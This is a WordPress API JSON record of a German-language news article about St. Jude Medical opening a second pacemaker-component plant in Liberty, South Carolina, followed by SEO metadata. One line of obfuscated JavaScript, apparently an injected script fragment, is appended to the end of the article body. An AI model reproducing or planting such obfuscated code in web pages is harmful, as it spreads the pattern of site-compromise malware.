{"id":9287,"date":"2020-10-28T16:35:04","date_gmt":"2020-10-28T16:35:04","guid":{"rendered":"http:\/\/alliancepickens.com\/2020\/10\/28\/st-jude-medical-eroeffnet-2-werk-greenville-news\/"},"modified":"2021-07-21T20:13:49","modified_gmt":"2021-07-21T20:13:49","slug":"st-jude-medical-eroeffnet-2-werk-greenville-news","status":"publish","type":"post","link":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/","title":{"rendered":"St. Jude Medical er\u00f6ffnet 2. Werk &#8211; Greenville News"},"content":{"rendered":"<p>Von. John C. Stevenson<br \/>\nLIBERTY &#8211; B\u00fcrger- und Politische F\u00fchrer kamen am 9. April nach Liberty, um einen ersten Blick auf eine neue Produktionsst\u00e4tte zu werfen, die innerhalb der n\u00e4chsten f\u00fcnf Jahre bis zu 300 Mitarbeiter besch\u00e4ftigen k\u00f6nnte.<br \/>\nSt. Jude Medical Inc., die bereits ein Werk in Liberty hat, feierte die Einweihung einer neuen Liberty-Produktionsst\u00e4tte, die die winzigen, elektronischen &#8220;Gehirne&#8221; herstellt, die lebensrettende Herzschrittmacher steuern.<br \/>\nUS-Repr\u00e4sentant Gresham Barrett betonte gegen\u00fcber den Versammelten, darunter viele der rund 20 Mitarbeiter, die das Werk derzeit besch\u00e4ftigt, wie wichtig die Arbeit dort ist.<br \/>\n&#8220;Man rettet jeden Tag alle drei Sekunden ein Leben&#8221;, sagte er und verwies auf die Produktlinie des Unternehmens, zu der Herzklappen, Herzschrittmacher, implantierbare Kardioverber-Defibrillatoren und Herzinsuffizienzger\u00e4te geh\u00f6ren. &#8220;Das ist unglaublich.&#8221;<br \/>\nBarrett wies auch auf die wirtschaftliche Bedeutung des Werks f\u00fcr Pickens County hin.<br \/>\n&#8220;Wir brauchen mehr Unternehmen wie St. Jude&#8221;, sagte er. &#8220;Wir brauchen mehr \u00f6ffentlich-private Partnerschaften. Wenn wir dieses Land wieder aufbauen wollen, muss es durch den privaten Sektor gehen.&#8221;<br \/>\nDie Anlage produzierte am 20. M\u00e4rz ihre erste hybride mikroelektronische Komponente und stellt derzeit 500 der Komponenten pro Woche her. Diese Zahl wird bis Ende des Jahres auf 2.500 pro Woche ansteigen, mit der Kapazit\u00e4t, in Zukunft noch gr\u00f6\u00dfere Mengen zu produzieren, so Sprecherin Amy Jo Meyer.<br \/>\nDan Starks, Pr\u00e4sident, Vorsitzender und CEO von St. Jude Medical, lobte die Arbeit im Pickens County und sagte: &#8220;Der Grund, warum wir hier sind, ist ihre Qualit\u00e4t als Menschen, Ihre Qualit\u00e4t als F\u00fchrungspers\u00f6nlichkeiten&#8221; und dass St. Jude Medical &#8220;unsere Investitionen in der Region weiter ausbauen wird&#8221;.<br \/>\nState Rep. B.R. Skelton sagte, St. Jude Medical sei ein Beispiel f\u00fcr die Arten von Unternehmen, die die Region anziehen m\u00fcsse.<br \/>\n&#8220;Das ist ein Hightech-Gesch\u00e4ft&#8221;, sagte er. &#8220;Es ist die Art der wirtschaftlichen Entwicklung, die f\u00fcr unsere B\u00fcrgerinnen und B\u00fcrger hochbezahlte Arbeitspl\u00e4tze darstellt.&#8221;<br \/>\nMeyer lehnte es ab, eine Gehaltsspanne f\u00fcr die Mitarbeiter des neuen Werks zu nennen, sagte aber, dass die L\u00f6hne &#8220;sehr wettbewerbsf\u00e4hig f\u00fcr die Region sind und im Einklang mit den L\u00f6hnen&#8221; in der urspr\u00fcnglichen St. Jude-Anlage stehen, die Kondensatoren f\u00fcr Herzschrittmacher herstellt.<br \/>\nStaatssenator Larry Martin, der auch beim Spatenstich im Jahr 2006 sprach, sagte, dass der Gesetzgeber weiterhin Unternehmen wie St. Jude helfen m\u00fcsse, im Palmetto-Staat ein Zuhause zu finden.<br \/>\n&#8220;Was wir in Kolumbien tun, ist zu versuchen, Ihre F\u00e4higkeit zu verbessern, hier Gesch\u00e4fte zu machen&#8221;, sagte er. &#8220;Sie haben die Werkzeuge. Was wir bieten wollen, ist die Umwelt.&#8221;<br \/>\nDas 60.000 Quadratmeter gro\u00dfe Werk grenzt an die erste St. Jude Medical Anlage im Pickens County Commerce Park.<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Von. John C. Stevenson LIBERTY &#8211; B\u00fcrger- und Politische F\u00fchrer kamen am 9. April nach Liberty, um einen ersten Blick auf eine neue Produktionsst\u00e4tte zu werfen, die innerhalb der n\u00e4chsten f\u00fcnf Jahre bis zu 300 Mitarbeiter besch\u00e4ftigen k\u00f6nnte. St. Jude Medical Inc., die bereits ein Werk in Liberty hat, feierte die Einweihung einer neuen Liberty-Produktionsst\u00e4tte,&hellip;<\/p>\n","protected":false},"author":8,"featured_media":5102,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[57],"tags":[],"class_list":["post-9287","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-de","category-57","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>St. Jude Medical er\u00f6ffnet 2. Werk - Greenville News - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"St. Jude Medical er\u00f6ffnet 2. Werk - Greenville News - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"Von. John C. Stevenson LIBERTY &#8211; B\u00fcrger- und Politische F\u00fchrer kamen am 9. April nach Liberty, um einen ersten Blick auf eine neue Produktionsst\u00e4tte zu werfen, die innerhalb der n\u00e4chsten f\u00fcnf Jahre bis zu 300 Mitarbeiter besch\u00e4ftigen k\u00f6nnte. St. Jude Medical Inc., die bereits ein Werk in Liberty hat, feierte die Einweihung einer neuen Liberty-Produktionsst\u00e4tte,&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-28T16:35:04+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-21T20:13:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"990\" \/>\n\t<meta property=\"og:image:height\" content=\"618\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"AP Transfer\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"AP Transfer\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/\"},\"author\":{\"name\":\"AP Transfer\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"headline\":\"St. Jude Medical er\u00f6ffnet 2. Werk &#8211; Greenville News\",\"datePublished\":\"2020-10-28T16:35:04+00:00\",\"dateModified\":\"2021-07-21T20:13:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/\"},\"wordCount\":493,\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"articleSection\":[\"News\"],\"inLanguage\":\"de-DE\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/\",\"name\":\"St. Jude Medical er\u00f6ffnet 2. Werk - Greenville News - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"datePublished\":\"2020-10-28T16:35:04+00:00\",\"dateModified\":\"2021-07-21T20:13:49+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/#primaryimage\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"contentUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2019\\\/04\\\/post-generic.jpg\",\"width\":990,\"height\":618,\"caption\":\"Alliance Pickens Logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/st-jude-medical-eroeffnet-2-werk-greenville-news\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"St. Jude Medical er\u00f6ffnet 2. Werk &#8211; Greenville News\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\",\"name\":\"AP Transfer\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"caption\":\"AP Transfer\"},\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/author\\\/aptransfer\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"St. Jude Medical er\u00f6ffnet 2. Werk - Greenville News - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/","og_locale":"de_DE","og_type":"article","og_title":"St. Jude Medical er\u00f6ffnet 2. Werk - Greenville News - Alliance Pickens","og_description":"Von. John C. Stevenson LIBERTY &#8211; B\u00fcrger- und Politische F\u00fchrer kamen am 9. April nach Liberty, um einen ersten Blick auf eine neue Produktionsst\u00e4tte zu werfen, die innerhalb der n\u00e4chsten f\u00fcnf Jahre bis zu 300 Mitarbeiter besch\u00e4ftigen k\u00f6nnte. St. Jude Medical Inc., die bereits ein Werk in Liberty hat, feierte die Einweihung einer neuen Liberty-Produktionsst\u00e4tte,&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/","og_site_name":"Alliance Pickens","article_published_time":"2020-10-28T16:35:04+00:00","article_modified_time":"2021-07-21T20:13:49+00:00","og_image":[{"width":990,"height":618,"url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","type":"image\/jpeg"}],"author":"AP Transfer","twitter_card":"summary_large_image","twitter_misc":{"Written by":"AP Transfer","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/#article","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/"},"author":{"name":"AP Transfer","@id":"https:\/\/alliancepickens.com\/de\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"headline":"St. Jude Medical er\u00f6ffnet 2. Werk &#8211; Greenville News","datePublished":"2020-10-28T16:35:04+00:00","dateModified":"2021-07-21T20:13:49+00:00","mainEntityOfPage":{"@id":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/"},"wordCount":493,"image":{"@id":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","articleSection":["News"],"inLanguage":"de-DE"},{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/","url":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/","name":"St. Jude Medical er\u00f6ffnet 2. Werk - Greenville News - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","datePublished":"2020-10-28T16:35:04+00:00","dateModified":"2021-07-21T20:13:49+00:00","author":{"@id":"https:\/\/alliancepickens.com\/de\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/"]}]},{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/#primaryimage","url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","contentUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2019\/04\/post-generic.jpg","width":990,"height":618,"caption":"Alliance Pickens Logo"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/st-jude-medical-eroeffnet-2-werk-greenville-news\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"St. Jude Medical er\u00f6ffnet 2. Werk &#8211; Greenville News"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"},{"@type":"Person","@id":"https:\/\/alliancepickens.com\/de\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01","name":"AP Transfer","image":{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","caption":"AP Transfer"},"url":"https:\/\/alliancepickens.com\/de\/author\/aptransfer\/"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/posts\/9287","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=9287"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/posts\/9287\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media\/5102"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=9287"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/categories?post=9287"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/tags?post=9287"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}